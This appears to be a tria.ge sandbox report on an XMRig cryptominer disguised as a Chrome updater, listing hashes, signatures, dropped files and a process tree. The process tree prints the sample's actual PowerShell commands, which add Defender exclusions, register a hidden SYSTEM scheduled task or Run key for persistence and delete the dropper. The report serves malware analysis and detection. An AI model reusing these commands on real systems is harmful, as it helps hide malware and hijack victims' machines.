Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

21/07/2024, 20:17

240721-y27lvsvfll 10

06/06/2024, 10:00

240606-l14glacf9x 10

06/06/2024, 10:00

240606-l12yrscf9w 10

06/06/2024, 09:56

240606-lyrd9acf71 10

06/06/2024, 09:55

240606-lx1xascf7v 10

06/06/2024, 09:55

240606-lxyf6scf7t 10

06/06/2024, 09:35

240606-lkvvhsce2y 10

06/06/2024, 09:32

240606-lhs8xacd7v 10

06/06/2024, 09:32

240606-lhsx5sdd47 10

Analysis

  • max time kernel
    1800s
  • max time network
    1795s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/06/2024, 09:35

General

  • Target

    qM5GMXBk6hJE6Y5e (23).exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 30 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 1 IoCs
  • UPX packed file 30 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3444
      • C:\Users\Admin\AppData\Local\Temp\qM5GMXBk6hJE6Y5e (23).exe
        "C:\Users\Admin\AppData\Local\Temp\qM5GMXBk6hJE6Y5e (23).exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:1420
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2932
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2852
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:2228
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
          3⤵
            PID:3076
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\qM5GMXBk6hJE6Y5e (23).exe"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1588
          • C:\Windows\System32\choice.exe
            choice /C Y /N /D Y /T 3
            3⤵
              PID:2760
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:4084
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:3892
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe qtdiqnkejoz
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Suspicious behavior: EnumeratesProcesses
            PID:5024
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            • Suspicious use of WriteProcessMemory
            PID:2664
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic PATH Win32_VideoController GET Name, VideoProcessor
              3⤵
              • Detects videocard installed
              PID:212
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            PID:2184
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
            2⤵
              PID:3148
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            1⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3004

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Program Files\Google\Chrome\updater.exe

            Filesize

            2.0MB

            MD5

            a16a669a09bf158058b83e04e69fe38e

            SHA1

            f6c94763850d9e590d86057139e8895a7aacdeea

            SHA256

            cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

            SHA512

            658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

          • C:\Program Files\Google\Libs\g.log

            Filesize

            226B

            MD5

            fdba80d4081c28c65e32fff246dc46cb

            SHA1

            74f809dedd1fc46a3a63ac9904c80f0b817b3686

            SHA256

            b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

            SHA512

            b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            2KB

            MD5

            a43e653ffb5ab07940f4bdd9cc8fade4

            SHA1

            af43d04e3427f111b22dc891c5c7ee8a10ac4123

            SHA256

            c4c53abb13e99475aebfbe9fec7a8fead81c14c80d9dcc2b81375304f3a683fe

            SHA512

            62a97e95e1f19a8d4302847110dae44f469877eed6aa8ea22345c6eb25ee220e7d310fa0b7ec5df42356815421c0af7c46a0f1fee8933cc446641800eda6cd1b

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            944B

            MD5

            b07dfcb280a1f198418ad032c2080319

            SHA1

            3e66782e112ef49e5023b7478bd18b77c8b93c99

            SHA256

            ca422ad542e18983fb0c97c8c0d9093b743d2bcf85a6a6870c0dcaa41f490af8

            SHA512

            2595822359ef2bf3a26319af8307985c5c77ac838633e0280bf7b704847014661c5ecdf7bb0620ca939fabb201142b69159c5291ece39f4dc79ad84f59d13851

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            0d28e0c9fe4439db985e3a7e3c6055d7

            SHA1

            484c5ab56151138115cb5cedc1f2a7e4543ecf30

            SHA256

            c80a22a06ec7f853a86f59eed3626b842465e153ec80c893e3414a4aed26c3a4

            SHA512

            5b4576a36aad30c0311d270f102ff91ac9253d042e96a81d19128bdea249f68fb571492bcd9323f072d193625a9b95824204d9e7342690f47f718aea14e8f562

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z01i3g5w.bru.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            4KB

            MD5

            bdb25c22d14ec917e30faf353826c5de

            SHA1

            6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

            SHA256

            e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

            SHA512

            b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            b42c70c1dbf0d1d477ec86902db9e986

            SHA1

            1d1c0a670748b3d10bee8272e5d67a4fabefd31f

            SHA256

            8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

            SHA512

            57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

          • memory/1420-0-0x00007FF67CB20000-0x00007FF67CD31000-memory.dmp

            Filesize

            2.1MB

          • memory/1420-36-0x00007FF67CB20000-0x00007FF67CD31000-memory.dmp

            Filesize

            2.1MB

          • memory/2852-29-0x00007FFA531B0000-0x00007FFA53C71000-memory.dmp

            Filesize

            10.8MB

          • memory/2852-30-0x00007FFA531B0000-0x00007FFA53C71000-memory.dmp

            Filesize

            10.8MB

          • memory/2852-31-0x00007FFA531B0000-0x00007FFA53C71000-memory.dmp

            Filesize

            10.8MB

          • memory/2852-32-0x00007FFA531B0000-0x00007FFA53C71000-memory.dmp

            Filesize

            10.8MB

          • memory/2852-34-0x00007FFA531B0000-0x00007FFA53C71000-memory.dmp

            Filesize

            10.8MB

          • memory/2852-18-0x00007FFA531B0000-0x00007FFA53C71000-memory.dmp

            Filesize

            10.8MB

          • memory/2932-16-0x00007FFA531B0000-0x00007FFA53C71000-memory.dmp

            Filesize

            10.8MB

          • memory/2932-13-0x00007FFA531B0000-0x00007FFA53C71000-memory.dmp

            Filesize

            10.8MB

          • memory/2932-12-0x00007FFA531B0000-0x00007FFA53C71000-memory.dmp

            Filesize

            10.8MB

          • memory/2932-11-0x000001FFBF8A0000-0x000001FFBF8C2000-memory.dmp

            Filesize

            136KB

          • memory/2932-1-0x00007FFA531B3000-0x00007FFA531B5000-memory.dmp

            Filesize

            8KB

          • memory/3004-49-0x00007FF6CBB60000-0x00007FF6CBD71000-memory.dmp

            Filesize

            2.1MB

          • memory/3004-106-0x00007FF6CBB60000-0x00007FF6CBD71000-memory.dmp

            Filesize

            2.1MB

          • memory/3148-107-0x000001BF2EC40000-0x000001BF2EC60000-memory.dmp

            Filesize

            128KB

          • memory/3148-126-0x00007FF6A9350000-0x00007FF6A9B44000-memory.dmp

            Filesize

            8.0MB

          • memory/3148-166-0x00007FF6A9350000-0x00007FF6A9B44000-memory.dmp

            Filesize

            8.0MB

          • memory/3148-164-0x00007FF6A9350000-0x00007FF6A9B44000-memory.dmp

            Filesize

            8.0MB

          • memory/3148-162-0x00007FF6A9350000-0x00007FF6A9B44000-memory.dmp

            Filesize

            8.0MB

          • memory/3148-160-0x00007FF6A9350000-0x00007FF6A9B44000-memory.dmp

            Filesize

            8.0MB

          • memory/3148-158-0x00007FF6A9350000-0x00007FF6A9B44000-memory.dmp

            Filesize

            8.0MB

          • memory/3148-156-0x00007FF6A9350000-0x00007FF6A9B44000-memory.dmp

            Filesize

            8.0MB

          • memory/3148-154-0x00007FF6A9350000-0x00007FF6A9B44000-memory.dmp

            Filesize

            8.0MB

          • memory/3148-152-0x00007FF6A9350000-0x00007FF6A9B44000-memory.dmp

            Filesize

            8.0MB

          • memory/3148-108-0x00007FF6A9350000-0x00007FF6A9B44000-memory.dmp

            Filesize

            8.0MB

          • memory/3148-110-0x00007FF6A9350000-0x00007FF6A9B44000-memory.dmp

            Filesize

            8.0MB

          • memory/3148-150-0x00007FF6A9350000-0x00007FF6A9B44000-memory.dmp

            Filesize

            8.0MB

          • memory/3148-112-0x00007FF6A9350000-0x00007FF6A9B44000-memory.dmp

            Filesize

            8.0MB

          • memory/3148-148-0x00007FF6A9350000-0x00007FF6A9B44000-memory.dmp

            Filesize

            8.0MB

          • memory/3148-114-0x00007FF6A9350000-0x00007FF6A9B44000-memory.dmp

            Filesize

            8.0MB

          • memory/3148-116-0x00007FF6A9350000-0x00007FF6A9B44000-memory.dmp

            Filesize

            8.0MB

          • memory/3148-118-0x00007FF6A9350000-0x00007FF6A9B44000-memory.dmp

            Filesize

            8.0MB

          • memory/3148-120-0x00007FF6A9350000-0x00007FF6A9B44000-memory.dmp

            Filesize

            8.0MB

          • memory/3148-122-0x00007FF6A9350000-0x00007FF6A9B44000-memory.dmp

            Filesize

            8.0MB

          • memory/3148-124-0x00007FF6A9350000-0x00007FF6A9B44000-memory.dmp

            Filesize

            8.0MB

          • memory/3148-146-0x00007FF6A9350000-0x00007FF6A9B44000-memory.dmp

            Filesize

            8.0MB

          • memory/3148-128-0x00007FF6A9350000-0x00007FF6A9B44000-memory.dmp

            Filesize

            8.0MB

          • memory/3148-130-0x00007FF6A9350000-0x00007FF6A9B44000-memory.dmp

            Filesize

            8.0MB

          • memory/3148-132-0x00007FF6A9350000-0x00007FF6A9B44000-memory.dmp

            Filesize

            8.0MB

          • memory/3148-134-0x00007FF6A9350000-0x00007FF6A9B44000-memory.dmp

            Filesize

            8.0MB

          • memory/3148-136-0x00007FF6A9350000-0x00007FF6A9B44000-memory.dmp

            Filesize

            8.0MB

          • memory/3148-138-0x00007FF6A9350000-0x00007FF6A9B44000-memory.dmp

            Filesize

            8.0MB

          • memory/3148-140-0x00007FF6A9350000-0x00007FF6A9B44000-memory.dmp

            Filesize

            8.0MB

          • memory/3148-142-0x00007FF6A9350000-0x00007FF6A9B44000-memory.dmp

            Filesize

            8.0MB

          • memory/3148-144-0x00007FF6A9350000-0x00007FF6A9B44000-memory.dmp

            Filesize

            8.0MB

          • memory/4084-73-0x0000023254CF0000-0x0000023254D0A000-memory.dmp

            Filesize

            104KB

          • memory/4084-68-0x0000023254A60000-0x0000023254A7C000-memory.dmp

            Filesize

            112KB

          • memory/4084-69-0x0000023254A80000-0x0000023254B35000-memory.dmp

            Filesize

            724KB

          • memory/4084-70-0x0000023254B40000-0x0000023254B4A000-memory.dmp

            Filesize

            40KB

          • memory/4084-71-0x0000023254CB0000-0x0000023254CCC000-memory.dmp

            Filesize

            112KB

          • memory/4084-72-0x0000023254C90000-0x0000023254C9A000-memory.dmp

            Filesize

            40KB

          • memory/4084-76-0x0000023254CE0000-0x0000023254CEA000-memory.dmp

            Filesize

            40KB

          • memory/4084-75-0x0000023254CD0000-0x0000023254CD6000-memory.dmp

            Filesize

            24KB

          • memory/4084-74-0x0000023254CA0000-0x0000023254CA8000-memory.dmp

            Filesize

            32KB

          • memory/5024-113-0x00007FF752B30000-0x00007FF752B46000-memory.dmp

            Filesize

            88KB

          • memory/5024-109-0x00007FF752B30000-0x00007FF752B46000-memory.dmp

            Filesize

            88KB